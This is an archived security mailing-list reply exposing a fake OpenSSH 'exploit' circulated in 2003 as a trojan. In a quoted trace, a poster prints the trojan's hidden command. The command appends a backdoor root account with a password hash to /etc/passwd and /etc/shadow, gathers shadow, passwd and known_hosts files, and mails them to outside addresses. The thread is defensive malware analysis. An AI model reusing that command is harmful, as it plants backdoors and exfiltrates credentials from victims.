lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Message-ID: <1063949309.3f6a93fd9f520@postoffice.tpg.com.au>
From: vosipov at tpg.com.au (Vitaly Osipov)
Subject: Re: new openssh exploit in the wild! * is FAKE AS SH@!*

This means that the original poster (gordon last) made it up himself, because he is saying : 

>> > i looked at this piece of exploit... it is binary so i'am not sure if 
>> > this is a trojan or a backdoor or a virus. but i can't see anything 
>> > strange while sniffing the exploit traffic. and i got root on serveral 
>> > of my openbsd boxes with that. the bruteforcer seems to be very good. 

which is obviously not true. Btw as far as I understand, the troyan code is triggered when 
the "exploit" is run with the offset specified, and not in a "bruteforcing" mode.

W.


>I'll confirm that it does this 


>The script actually opens a socket and connects to the target sshd but 
>does nothing with that connection. 


>It also takes a pretty deep look into /proc/net looking for other 
>networks attached to the device it is run from.... 


>chris 






>On Fri, 2003-09-19 at 20:02, KF wrote: 
>> printf("[*] sending shellcode\n")= 22 
>> popen("(echo "sys3:x:0:103::/:/bin/sh" >> /etc/passwd; echo 
>> "sys3:\\$1\\$nWXmkX74\\$Ws8fX/MFI3.j5HKahNqIQ0:12311:0:9999 
>> 9:7:::" >> /etc/shadow; /sbin/ifconfig -a >/tmp/.tmp;cat /etc/passwd 
>> /etc/shadow /root/.ssh*/known_hosts >> /tmp/.tmp; 
>> find /home -name known_hosts -exec cat {} >> /tmp/.tmp;cat /tmp/.tmp | 
>> /usr/sbin/sendmail -f ownage_at_gmx.de 
>> m0nkeyhack_at_supermarkt.de) &> /dev/null ; rm -f /tmp/.tmp;", "r") = 
>> 0x0804a6b0 
>> 
>> 
>> -KF 
>> 
>> 
>> gordon last wrote: 
>> > hi readers, 
>> > while i was staying idle in an so called 0day release channel on one irc 
>> > network some scriptkiddies were 
>> > talking about an new 0day release. 
>> > 
>> > in my backlog i can see the following: 
>> > ---cut 
>> > 08:09 [R4lph] *** r3t0r (r4lph_at_xxx) has joined channel #0dayz 
>> > 08:09 [R4lph] 0day: http://www.anzwers.org/free/m0nkeyhack/0d/ 
>> > ---cut 
>> > 
>> > i looked at this piece of exploit... it is binary so i'am not sure if 
>> > this is a trojan or a backdoor or a virus. but i can't see anything 
>> > strange while sniffing the exploit traffic. and i got root on serveral 
>> > of my openbsd boxes with that. the bruteforcer seems to be very good. 
>> > 
>> > i too looked at "strings theosshucksass" and found nothing suspicious. 
>> > 
>> > this exploit seems to be in the wild (underground) since beginning of 
>> > august. 
>> > 
>> > thats quite a long time i hope most admins are patching the systems 
>> > now... because the exploit is getting round faster and faster. 
>> > 
>> > if anyone can reverse engineer this piece it would be great if he posts 
>> > his resulsts on his list because iam really intressted on the exploiting 
>> > technique used for that bug. 
>> > 
>> > i cant get an idea on how to exploit this. 
>> > 
>> > hmm... 
>> > regards, 
>> > glast 
>> >

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ